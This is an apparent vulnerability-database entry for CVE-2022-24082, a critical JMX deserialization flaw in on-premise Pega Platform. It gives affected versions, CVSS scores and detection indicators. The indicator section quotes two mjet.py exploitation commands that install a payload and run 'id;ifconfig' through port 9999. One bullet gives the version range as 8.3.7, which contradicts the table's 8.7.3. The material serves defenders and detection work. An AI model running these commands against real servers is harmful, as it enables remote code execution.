CVE-2022-24082
published 2022-07-19CVE-2022-24082: If an on-premise installation of the Pega Platform is configured with the port for the JMX interface exposed to the Internet and port filtering is not properly…
PriorityP268critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
9.48%
94.8th percentile
If an on-premise installation of the Pega Platform is configured with the port for the JMX interface exposed to the Internet and port filtering is not properly configured, then it may be possible to upload serialized payloads to attack the underlying system. This does not affect systems running on PegaCloud due to its design and architecture.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pega | infinity | >= 8.1.0 < 8.7.3 | 8.7.3 |
| pegasystems | pega_infinity | >= 8.1.0 < unspecified | unspecified |
| pegasystems | pega_infinity | >= unspecified < 8.7.3 | 8.7.3 |
Detection & IOCsextracted from sources · hover to see the quote
commandjava -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass 9999 install random_password http://:6666 6666↗
commandjava -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass 9999 command random_password "id;ifconfig"↗
- →Scan for exposed JMX/RMI registry on TCP port 9999; unexpected external exposure of this port on Pega Platform on-premise installations is a strong indicator of attack surface for CVE-2022-24082. ↗
- →Monitor for use of MOGWAI LABS JMX Exploitation Toolkit (mjet.py) with --localhost_bypass flag targeting port 9999, which is the exploitation method for this CVE. ↗
- →Alert on inbound serialized payload uploads to the JMX interface; the vulnerability is triggered by uploading serialized payloads to the exposed JMX port. ↗
- →Detect dynamic RMI TCP port probing following an initial RMI registry dump — attackers extract the dynamic port from the RMI dump and then probe it directly. ↗
- →Presence of jython-standalone-2.7.2.jar on a host alongside mjet.py is indicative of JMX exploitation tooling associated with this CVE. ↗
- ·This vulnerability only affects on-premise Pega Platform installations where the JMX interface port is exposed to the Internet without proper port filtering; PegaCloud deployments are not affected. ↗
- ·Affected version range is Pega Platform 8.1.0 on-premise and higher, up to 8.3.7; systems outside this range or properly firewalled are not directly exploitable. ↗
- ·Exploitation requires the JMX port to be reachable from the attacker; the RMI dump reports 127.0.0.1 but the service actually listens on the network interface, which may cause defenders to underestimate exposure. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/169480/Pega-Platform-8.7.3-Remote-Code-Execution.htmlhttps://support.pega.com/support-doc/pega-security-advisory-b22-vulnerability-%E2%80%93-hotfix-matrix-0http://packetstormsecurity.com/files/169480/Pega-Platform-8.7.3-Remote-Code-Execution.htmlhttps://support.pega.com/support-doc/pega-security-advisory-b22-vulnerability-%E2%80%93-hotfix-matrix-0
2022-07-19
Published